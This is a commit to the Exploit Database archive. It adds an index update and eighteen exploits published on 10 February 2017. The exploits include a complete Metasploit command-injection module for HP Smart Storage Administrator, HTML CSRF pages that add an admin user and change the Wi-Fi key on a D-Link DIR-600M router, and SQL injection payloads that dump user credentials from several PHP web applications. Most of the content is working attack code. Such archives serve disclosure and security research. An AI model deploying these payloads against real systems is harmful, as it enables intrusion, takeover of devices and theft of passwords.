DB: 2017-02-11

18 new exploits

Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)
HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)
F5 BIG-IP SSL Virtual Server - Memory Disclosure
CMS Lite 1.3.1 - SQL Injection
Tiger Post 3.0.1 - SQL Injection
Gram Post 1.0 - SQL Injection
Youtube Analytics Multi Channel 3.0 - SQL Injection
Collabo - Arbitrary File Download
Takas Classified 1.1 - SQL Injection
Zigaform - SQL Injection
Multilanguage Estate Agency Pro 1.2 - SQL Injection
QWIKIA 1.1.1 - SQL Injection
Automated Job Portal Script - SQL Injection
CLUB-8 EMS - SQL Injection
Uploadr - SQL Injection
CodePaul ClipMass - SQL Injection
Video Subscription - SQL Injection
D-link DIR-600M - Cross-Site Request Forgery
HotelCMS with Booking Engine - SQL Injection
This commit is contained in:
Offensive Security 2017-02-11 05:01:16 +00:00
parent a6133048b5
commit dcc7720ad6
19 changed files with 586 additions and 1 deletions

View file

@ -8600,7 +8600,7 @@ id,file,description,date,author,platform,type,port
39694,platforms/windows/local/39694.txt,"Microsoft Excel - Out-of-Bounds Read Remote Code Execution (MS16-042)",2016-04-14,"Sébastien Morin",windows,local,0
39702,platforms/linux/local/39702.rb,"Exim - 'perl_startup' Privilege Escalation (Metasploit)",2016-04-15,Metasploit,linux,local,0
39967,platforms/linux/local/39967.txt,"SolarWinds Virtualization Manager - Privilege Escalation",2016-06-16,"Nate Kettlewell",linux,local,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39719,platforms/windows/local/39719.ps1,"Microsoft Windows 7 < 10 / Server 2008 < 2012 R2 (x86/x64) - Privilege Escalation (MS16-032) (PowerShell)",2016-04-21,b33f,windows,local,0
39727,platforms/windows/local/39727.txt,"CompuSource Systems - Real Time Home Banking - Privilege Escalation",2016-04-25,"Information Paradox",windows,local,0
39734,platforms/linux/local/39734.py,"Yasr Screen Reader 0.6.9 - Local Buffer Overflow",2016-04-26,"Juan Sacco",linux,local,0
39741,platforms/osx/local/39741.txt,"Mach Race OSX - Privilege Escalation",2016-04-27,fG!,osx,local,0
@ -15264,6 +15264,8 @@ id,file,description,date,author,platform,type,port
41162,platforms/linux/remote/41162.py,"Haraka < 2.8.9 - Remote Command Execution",2017-01-26,Xychix,linux,remote,0
41233,platforms/linux/remote/41233.py,"CUPS < 2.0.3 - Remote Command Execution",2017-02-03,@0x00string,linux,remote,0
41236,platforms/hardware/remote/41236.py,"Netwave IP Camera - Password Disclosure",2017-02-03,spiritnull,hardware,remote,0
41297,platforms/multiple/remote/41297.rb,"HP Smart Storage Administrator 2.30.6.0 - Remote Command Injection (Metasploit)",2017-02-10,MaKyOtOx,multiple,remote,0
41298,platforms/hardware/remote/41298.txt,"F5 BIG-IP SSL Virtual Server - Memory Disclosure",2017-02-10,"Ege Balci",hardware,remote,0
14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@ -37209,3 +37211,19 @@ id,file,description,date,author,platform,type,port
41286,platforms/php/webapps/41286.txt,"SOA School Management - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41287,platforms/php/webapps/41287.txt,"Client Expert 1.0.1 - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41288,platforms/php/webapps/41288.txt,"EXAMPLO - SQL Injection",2017-02-09,"Ihsan Sencan",php,webapps,0
41290,platforms/php/webapps/41290.txt,"CMS Lite 1.3.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41291,platforms/php/webapps/41291.txt,"Tiger Post 3.0.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41292,platforms/php/webapps/41292.txt,"Gram Post 1.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41293,platforms/php/webapps/41293.txt,"Youtube Analytics Multi Channel 3.0 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41294,platforms/php/webapps/41294.txt,"Collabo - Arbitrary File Download",2017-02-10,"Ihsan Sencan",php,webapps,0
41295,platforms/php/webapps/41295.txt,"Takas Classified 1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41296,platforms/php/webapps/41296.txt,"Zigaform - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41300,platforms/php/webapps/41300.txt,"Multilanguage Estate Agency Pro 1.2 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41301,platforms/php/webapps/41301.txt,"QWIKIA 1.1.1 - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41302,platforms/php/webapps/41302.txt,"Automated Job Portal Script - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41303,platforms/php/webapps/41303.txt,"CLUB-8 EMS - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41304,platforms/php/webapps/41304.txt,"Uploadr - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41305,platforms/php/webapps/41305.txt,"CodePaul ClipMass - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41306,platforms/php/webapps/41306.txt,"Video Subscription - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0
41299,platforms/hardware/webapps/41299.html,"D-link DIR-600M - Cross-Site Request Forgery",2017-02-10,"Ajay S. Kulal",hardware,webapps,0
41307,platforms/php/webapps/41307.txt,"HotelCMS with Booking Engine - SQL Injection",2017-02-10,"Ihsan Sencan",php,webapps,0

Can't render this file because it is too large.

View file

@ -0,0 +1,12 @@
/*
# Exploit Title: [Ticketbleed (CVE-2016-9244) F5 BIG-IP SSL virtual server Memory Leakage]
# Date: [10.02.2017]
# Exploit Author: [Ege Balcı]
# Vendor Homepage: [https://f5.com/]
# Version: [12.0.0 - 12.1.2 && 11.4.0 - 11.6.1]
# Tested on: [Multiple]
# CVE : [CVE-2016-9244]
POC:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41298.zip

View file

@ -0,0 +1,92 @@
# Exploit Title:D-link wireless router DIR-600M Cross-Site Request Forgery (CSRF) vulnerability
# Google Dork:N/A
# Date: 07/02/2017
# Exploit Author:Ajay S. Kulal (www.twitter.com/ajay_kulal)
# Vendor Homepage:dlink.com
# Software Link:N/A
# Version:Hardware version: C1
Firmware version: 3.03
# Tested on:All Platforms
# CVE :CVE-2017-5874
Abstract:
=======
Cross-Site Request Forgery (CSRF) vulnerability in the DIR-600M wireless router enables an attacker
to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.
Exploitation-Technique:
===================
Remote
Severity Rating:
===================
7.9 (AV:A/AC:M/Au:N/C:C/I:C/A:C)
Details:
=======
An attacker who lures a DIR-600M authenticated user to browse a malicious website
can exploit cross site request forgery (CSRF) to add new admin, change wifi password and to change other network settings.
Proof Of Concept code:
====================
1. Add new user with root access
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2userconfig.cgi" method="POST">
<input type="hidden" name="username" value="AK" />
<input type="hidden" name="privilege" value="2" />
<input type="hidden" name="newpass" value="dolphin" />
<input type="hidden" name="confpass" value="dolphin" />
<input type="hidden" name="adduser" value="Add" />
<input type="hidden" name="hiddenpass" value="" />
<input type="hidden" name="submit&#46;htm&#63;userconfig&#46;htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. changing wireless password
<html>
<!-- CSRF PoC - by Ajay Kulal -->
<body>
<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">
<input type="hidden" name="domain" value="1" />
<input type="hidden" name="hiddenSSID" value="on" />
<input type="hidden" name="ssid" value="Dravidian" />
<input type="hidden" name="band" value="10" />
<input type="hidden" name="chan" value="0" />
<input type="hidden" name="chanwid" value="1" />
<input type="hidden" name="txRate" value="0" />
<input type="hidden" name="method&#95;cur" value="0" />
<input type="hidden" name="method" value="2" />
<input type="hidden" name="authType" value="2" />
<input type="hidden" name="length" value="1" />
<input type="hidden" name="format" value="2" />
<input type="hidden" name="defaultTxKeyId" value="1" />
<input type="hidden" name="key1" value="0000000000" />
<input type="hidden" name="pskFormat" value="0" />
<input type="hidden" name="pskValue" value="password123" />
<input type="hidden" name="checkWPS2" value="1" />
<input type="hidden" name="save" value="Apply" />
<input type="hidden" name="basicrates" value="15" />
<input type="hidden" name="operrates" value="4095" />
<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

View file

@ -0,0 +1,178 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::CmdStager
include Msf::Exploit::Remote::HttpClient
def initialize(info={})
super(update_info(info,
'Name' => "HP Smart Storage Administrator Remote Command Injection",
'Description' => %q{
This module exploits a vulnerability found in HP Smart Storage Administrator. By
supplying a specially crafted HTTP request, it is possible to control the
'command' variable in function isDirectFileAccess (found in ipcelmclient.php),
which will be used in a proc_open() function. Versions prior to HP SSA 2.60.18.0 are vulnerable.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Nicolas Mattiocco (@MaKyOtOx)' # Discovery & multi-platform Metasploit module
],
'References' =>
[
['CVE', '2016-8523']
],
'DefaultOptions' =>
{
'SSL' => true
},
'Platform' => %w{ linux win },
'Targets' =>
[
['Linux', {
'Platform' => 'linux',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'bourne'
}],
['Linux (x64)', {
'Platform' => 'linux',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'bourne'
}],
['Windows', {
'Platform' => 'win',
'Arch' => ARCH_X86,
'CmdStagerFlavor' => 'certutil'
}],
['Windows (x64)', {
'Platform' => 'win',
'Arch' => ARCH_X86_64,
'CmdStagerFlavor' => 'certutil'
}],
],
'Privileged' => false,
'DisclosureDate' => "Jan 30 2017"
))
register_options(
[
Opt::RPORT(2381),
# USERNAME/PASS may not be necessary, because the anonymous access is possible
OptString.new("USERNAME", [false, 'The username to authenticate as']),
OptString.new("PASSWORD", [false, 'The password to authenticate with'])
], self.class)
end
def check
@cookie = ''
sig = Rex::Text.rand_text_alpha(8)
cmd = "&echo%20#{sig}&echo"
res = send_command(cmd, true)
if not res
vprint_error("#{peer} - Connection timed out")
return Exploit::CheckCode::Unknown
end
if res.code == 200 && res.headers.to_s() =~ /#{sig}/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def login
username = datastore['USERNAME']
password = datastore['PASSWORD']
cookie = ''
res = send_request_cgi({
'method' => 'POST',
'uri' => '/proxy/ssllogin',
'vars_post' => {
'redirecturl' => '',
'redirectquerystring' => '',
'user' => username,
'password' => password
}
})
if not res
fail_with(Failure::Unknown, "#{peer} - Connection timed out during login")
end
# CpqElm-Login: success
if res.headers['CpqElm-Login'].to_s =~ /success/
cookie = res.get_cookies.scan(/(Compaq\-HMMD=[\w\-]+)/).flatten[0] || ''
end
cookie
end
def setup_stager
execute_cmdstager(:temp => './', :linemax => 2800)
end
def execute_command(cmd, opts={})
res = send_command(cmd, false)
if res && res.code != 200
vprint_error("Unexpected response:\n#{res}")
fail_with(Failure::Unknown, "There was an unexpected response")
end
end
def send_command(cmd, check)
if !datastore['USERNAME'].to_s.empty? && !datastore['PASSWORD'].to_s.empty? && @cookie.empty?
@cookie = login
if @cookie.empty?
fail_with(Failure::NoAccess, "#{peer} - Login failed")
else
print_good("#{peer} - Logged in as '#{datastore['USERNAME']}'")
end
end
req_opts = {}
# For the check() function, use GET method
if check
req_opts['uri'] = "/HPSSA/index.htm#{cmd}"
req_opts['method'] = "GET"
else
req_opts['uri'] = "/HPSSA/index.htm"
req_opts['method'] = "POST"
req_opts['vars_post'] = {'msf'=>'red'}
case target.opts['Platform']
when "linux" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"/tmp/")} & echo \""
when "win" then req_opts['data'] = "\" & #{cmd.gsub(/\.\//,"\.\\")} & echo \""
end
end
unless @cookie.empty?
browser_chk = 'HPSMH-browser-check=done for this session'
curl_loc = "curlocation-#{datastore['USERNAME']}="
req_opts['cookie'] = "#{@cookie}; #{browser_chk}; #{curl_loc}"
end
send_request_cgi(req_opts)
end
def exploit
@cookie = ''
setup_stager
end
end

18
platforms/php/webapps/41290.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Creative Management System - CMS Lite v1.3.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.cmslite.co.uk/
# Software Buy: https://codecanyon.net/item/creative-management-system-cms-lite/15297597
# Demo: http://www.cmslite.co.uk/
# Version: 1.3.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/?Style=[SQL]
# Etc...
# # # # #

20
platforms/php/webapps/41291.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Tiger Post - Facebook Auto Post Multi Pages/Groups/Profiles v3.0.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/tiger-post-facebook-auto-post-multi-pagesgroupsprofiles/15279075
# Demo: http://demo.vtcreators.com/tigerpost/
# Version: 3.0.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# -999'+/*!50000union*/+select+1,2,3,4,group_concat(email,char(58),password),0x496873616e2053656e63616e,7,8,9,10,11,12+from+user_management-- -
# Etc...
# # # # #

20
platforms/php/webapps/41292.txt Executable file
View file

@ -0,0 +1,20 @@
# # # # #
# Exploit Title: Gram Post - Instagram Auto Post Multi Accounts with Paypal integration v1.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/gram-post-instagram-auto-post-multi-accounts-with-paypal-integration/19264650
# Demo: http://demo.vtcreators.com/grampost/
# Version: 1.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/instagram_accounts/update?id=[SQL]
# -9999'+/*!50000union*/+select+group_concat(email,char(58),password),2,3,4,5,6+from+user_management-- -
# Etc...
# # # # #

19
platforms/php/webapps/41293.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Youtube Analytics Multi Channel v3.0 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://vtcreators.com/
# Software Buy: https://codecanyon.net/item/youtube-analytics-multi-channel/14720919
# Demo: http://demo.vtcreators.com/yamc/
# Version: 3.0
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as regular user
# http://localhost/[PATH]/index.php/user_management/update?id=[SQL]
# Etc...
# # # # #

19
platforms/php/webapps/41294.txt Executable file
View file

@ -0,0 +1,19 @@
# # # # #
# Exploit Title: Collabo - TeamBusiness Collaboration Network - Arbitrary File Download
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://321-internet.com/
# Software Buy: https://codecanyon.net/item/collabo-teambusiness-collaboration-network/15242543
# Demo: http://321-internet.com/codecanyon/collabo/demo/collabo/index.php
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# Exploit :
# Login as regular user
# http://localhost/[PATH]/download.php?file_id=[FILE]&file_name=Ihsan_Sencan&file_type=php
# Etc...
# # # # #

23
platforms/php/webapps/41295.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Takas Classified Codeigniter PHP Classified Ad Script v1.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://artifectx.com/
# Software Buy: https://codecanyon.net/item/takas-classified-codeigniter-php-classified-ad-script/15227824
# Demo: http://takas.artifectx.com/
# Version: 1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/index.php/classified_ads/ads/?&subcatid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&catid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&locid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&areaid=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&type=[SQL]
# http://localhost/[PATH]/index.php/classified_ads/ads/?&post=[SQL]
# Etc... Etc...
# # # # #

18
platforms/php/webapps/41296.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Zigaform - PHP Form Builder - Contact & Survey v2.9.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://php-form-builder.zigaform.com/
# Software Buy: https://codecanyon.net/item/zigaform-php-form-builder-contact-survey/14889427
# Demo: http://demo-phpformbuilder.zigaform.com/index.php
# Version: 2.9.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/formbuilder/frontend/viewform/?form=[SQL]
# Etc...
# # # # #

17
platforms/php/webapps/41300.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: Multilanguage Estate Agency Pro 1.2 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://djrust26.hu/
# Software Buy: https://codecanyon.net/item/multilanguage-estate-agency-pro-12/14521069
# Demo: http://djrust26.hu/realestate/
# Version: 1.2
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/property_show.php?id=[SQL]
# # # # #

17
platforms/php/webapps/41301.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: QWIKIA - Ask And Answer Platform 1.1.1 - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://xandr.co/
# Software Buy: http://xandr.co/portfolio/qwikia
# Demo: http://qwikia.xandr.co/
# Version: 1.1.1
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?q=[SQL]
# # # # #

23
platforms/php/webapps/41302.txt Executable file
View file

@ -0,0 +1,23 @@
# # # # #
# Exploit Title: Automated Job Portal Script - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://www.jagaad.com/
# Software Buy: https://codecanyon.net/item/automated-job-portal-script/14318664
# Demo: http://www.jagaad.com/demo/php/automated-job-portal/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/jobdetail.php?id=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=1&location=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -
#
# http://localhost/[PATH]/search.php?keyword=a&location=&co=[SQL]
-999'+union+all+select+1,2,3,4,concat_ws(0x3c62723e,id,0x3c62723e,username,0x3c62723e,password,0x3c62723e,email),6,7,8,9,10,11,0x496873616e2053656e63616e202d207777772e696873616e2e6e6574,13,14,15,16,17,18,19,20,21,22,@@version,24,25,26,27,28+from+admin-- -

22
platforms/php/webapps/41303.txt Executable file
View file

@ -0,0 +1,22 @@
# # # # #
# Exploit Title: CLUB-8 EMS - Event Management System - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://rexbd.net/
# Software Buy: https://codecanyon.net/item/club8-ems-event-management-system-a-to-z/14067759
# Demo: http://ems.rexbd.net/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# Login as sales man user
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+group_concat(username,char(58),password),0x496873616e2053656e63616e,0x7777772e696873616e2e6e6574,4,5,6,7,8,9,10,11,12,13,14+from+users-- -
#
# http://localhost/[PATH]/editwatch.php?id=[SQL]
-999'+/*!50000union*/+select+1,group_concat(username,char(58),password)+from+users-- -
# # # # #

18
platforms/php/webapps/41304.txt Executable file
View file

@ -0,0 +1,18 @@
# # # # #
# Exploit Title: Uploadr - Project Files Management - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://lagunaproperty.com/
# Software Buy: https://codecanyon.net/item/uploadr-project-files-management/13545125
# Demo: http://download.lagunaproperty.com/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# http://localhost/[PATH]/download?file=[SQL]
# # # # #

17
platforms/php/webapps/41305.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: CodePaul ClipMass - Video Portal Site - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/codepaul-clipmass-video-portal-site/14681505
# Demo: http://codepaul.com/clipmass/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# # # # #

17
platforms/php/webapps/41306.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: TV - Video Subscription - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/tv-video-subscription/13966427
# Demo: http://codepaul.com/tv/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/search?keyword=[SQL]
# # # # #

17
platforms/php/webapps/41307.txt Executable file
View file

@ -0,0 +1,17 @@
# # # # #
# Exploit Title: HotelCMS with Booking Engine - SQL Injection
# Google Dork: N/A
# Date: 10.02.2017
# Vendor Homepage: http://codepaul.com/
# Software Buy: https://codecanyon.net/item/hotelcms-with-booking-engine/12789671
# Demo: http://codepaul.com/hotelcms/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # #
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/locale?locale=[SQL]
# # # # #